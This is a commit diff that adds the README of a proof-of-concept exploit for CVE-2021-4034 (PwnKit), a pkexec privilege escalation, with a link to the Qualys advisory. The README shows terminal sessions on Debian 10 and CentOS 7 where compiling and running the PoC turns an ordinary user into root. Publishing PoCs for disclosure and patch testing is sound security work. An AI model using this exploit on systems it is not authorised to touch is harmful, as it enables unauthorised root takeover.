parent
282f5160c6
commit
b1bf6865c3
@ -0,0 +1,31 @@ |
||||
# CVE-2021-4034 |
||||
PoC for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) |
||||
|
||||
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 |
||||
|
||||
# PoC |
||||
|
||||
Verified on Debian 10 and CentOS 7. |
||||
|
||||
``` |
||||
user@debian:~$ grep PRETTY /etc/os-release |
||||
PRETTY_NAME="Debian GNU/Linux 10 (buster)" |
||||
user@debian:~$ id |
||||
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) |
||||
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc |
||||
user@debian:~$ ./cve-2021-4034-poc |
||||
# id |
||||
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user) |
||||
``` |
||||
|
||||
``` |
||||
[user@centos ~]$ grep PRETTY /etc/os-release |
||||
PRETTY_NAME="CentOS Linux 7 (Core)" |
||||
[user@centos ~]$ id |
||||
uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 |
||||
[user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc |
||||
[user@centos ~]$ ./cve-2021-4034-poc |
||||
sh-4.2# id |
||||
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 |
||||
sh-4.2# exit |
||||
``` |
Loading…
Reference in new issue